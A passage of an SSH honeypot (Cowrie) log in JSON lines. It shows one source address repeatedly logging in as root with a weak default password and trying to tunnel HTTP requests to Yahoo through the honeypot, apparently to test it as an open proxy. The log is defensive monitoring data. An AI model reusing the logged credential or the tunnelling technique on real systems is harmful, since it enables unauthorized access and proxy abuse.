openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:01:26.566358Z","src_ip":"213.209.150.239","session":"d96bee82e81f"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:01:26.800564Z","src_ip":"213.209.150.239","session":"d96bee82e81f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":27650,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:27650","sensor":"my-vps","timestamp":"2025-08-26T01:01:26.848553Z","session":"d96bee82e81f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:26.895527Z","src_ip":"213.209.150.239","session":"d96bee82e81f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":25743,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:25743","sensor":"my-vps","timestamp":"2025-08-26T01:01:27.033553Z","session":"d96bee82e81f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:27.080721Z","src_ip":"213.209.150.239","session":"d96bee82e81f"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:01:27.128880Z","src_ip":"213.209.150.239","session":"d96bee82e81f"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":18416,"dst_ip":"1.2.3.4","dst_port":22,"session":"886133b8523b","protocol":"ssh","message":"New connection: 213.209.150.239:18416 (1.2.3.4:22) [session: 886133b8523b]","sensor":"my-vps","timestamp":"2025-08-26T01:01:27.175450Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:01:27.176172Z","src_ip":"213.209.150.239","session":"886133b8523b"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:01:27.223796Z","src_ip":"213.209.150.239","session":"886133b8523b"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:01:27.460071Z","src_ip":"213.209.150.239","session":"886133b8523b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":12593,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:12593","sensor":"my-vps","timestamp":"2025-08-26T01:01:27.511182Z","session":"886133b8523b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:27.559048Z","src_ip":"213.209.150.239","session":"886133b8523b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":7311,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:7311","sensor":"my-vps","timestamp":"2025-08-26T01:01:27.693740Z","session":"886133b8523b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:27.741108Z","src_ip":"213.209.150.239","session":"886133b8523b"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:01:27.789082Z","src_ip":"213.209.150.239","session":"886133b8523b"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":18474,"dst_ip":"1.2.3.4","dst_port":22,"session":"3564a95285c4","protocol":"ssh","message":"New connection: 213.209.150.239:18474 (1.2.3.4:22) [session: 3564a95285c4]","sensor":"my-vps","timestamp":"2025-08-26T01:01:27.835123Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:01:27.844995Z","src_ip":"213.209.150.239","session":"3564a95285c4"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:01:27.882359Z","src_ip":"213.209.150.239","session":"3564a95285c4"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:01:28.116989Z","src_ip":"213.209.150.239","session":"3564a95285c4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":31363,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:31363","sensor":"my-vps","timestamp":"2025-08-26T01:01:28.166157Z","session":"3564a95285c4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:28.213737Z","src_ip":"213.209.150.239","session":"3564a95285c4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":12603,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:12603","sensor":"my-vps","timestamp":"2025-08-26T01:01:28.357486Z","session":"3564a95285c4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:28.404675Z","src_ip":"213.209.150.239","session":"3564a95285c4"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:01:28.452891Z","src_ip":"213.209.150.239","session":"3564a95285c4"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":18521,"dst_ip":"1.2.3.4","dst_port":22,"session":"88e541553714","protocol":"ssh","message":"New connection: 213.209.150.239:18521 (1.2.3.4:22) [session: 88e541553714]","sensor":"my-vps","timestamp":"2025-08-26T01:01:28.499024Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:01:28.499737Z","src_ip":"213.209.150.239","session":"88e541553714"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:01:28.547361Z","src_ip":"213.209.150.239","session":"88e541553714"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:01:28.781667Z","src_ip":"213.209.150.239","session":"88e541553714"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":2196,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:2196","sensor":"my-vps","timestamp":"2025-08-26T01:01:28.829753Z","session":"88e541553714"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:28.876900Z","src_ip":"213.209.150.239","session":"88e541553714"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":22827,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:22827","sensor":"my-vps","timestamp":"2025-08-26T01:01:29.013665Z","session":"88e541553714"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:29.060595Z","src_ip":"213.209.150.239","session":"88e541553714"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:01:29.108407Z","src_ip":"213.209.150.239","session":"88e541553714"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":18581,"dst_ip":"1.2.3.4","dst_port":22,"session":"b3792265a6e9","protocol":"ssh","message":"New connection: 213.209.150.239:18581 (1.2.3.4:22) [session: b3792265a6e9]","sensor":"my-vps","timestamp":"2025-08-26T01:01:29.164236Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:01:29.165274Z","src_ip":"213.209.150.239","session":"b3792265a6e9"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:01:29.222168Z","src_ip":"213.209.150.239","session":"b3792265a6e9"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:01:29.504437Z","src_ip":"213.209.150.239","session":"b3792265a6e9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":16617,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:16617","sensor":"my-vps","timestamp":"2025-08-26T01:01:29.562247Z","session":"b3792265a6e9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:29.619322Z","src_ip":"213.209.150.239","session":"b3792265a6e9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":28963,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:28963","sensor":"my-vps","timestamp":"2025-08-26T01:01:29.775138Z","session":"b3792265a6e9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:29.831833Z","src_ip":"213.209.150.239","session":"b3792265a6e9"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:01:29.890907Z","src_ip":"213.209.150.239","session":"b3792265a6e9"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":18637,"dst_ip":"1.2.3.4","dst_port":22,"session":"c47df782ae31","protocol":"ssh","message":"New connection: 213.209.150.239:18637 (1.2.3.4:22) [session: c47df782ae31]","sensor":"my-vps","timestamp":"2025-08-26T01:01:29.936827Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:01:29.937617Z","src_ip":"213.209.150.239","session":"c47df782ae31"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:01:29.984731Z","src_ip":"213.209.150.239","session":"c47df782ae31"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:01:30.219122Z","src_ip":"213.209.150.239","session":"c47df782ae31"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":2690,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:2690","sensor":"my-vps","timestamp":"2025-08-26T01:01:30.267311Z","session":"c47df782ae31"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:30.314697Z","src_ip":"213.209.150.239","session":"c47df782ae31"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":23878,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:23878","sensor":"my-vps","timestamp":"2025-08-26T01:01:30.449431Z","session":"c47df782ae31"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:30.496623Z","src_ip":"213.209.150.239","session":"c47df782ae31"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:01:30.544566Z","src_ip":"213.209.150.239","session":"c47df782ae31"}
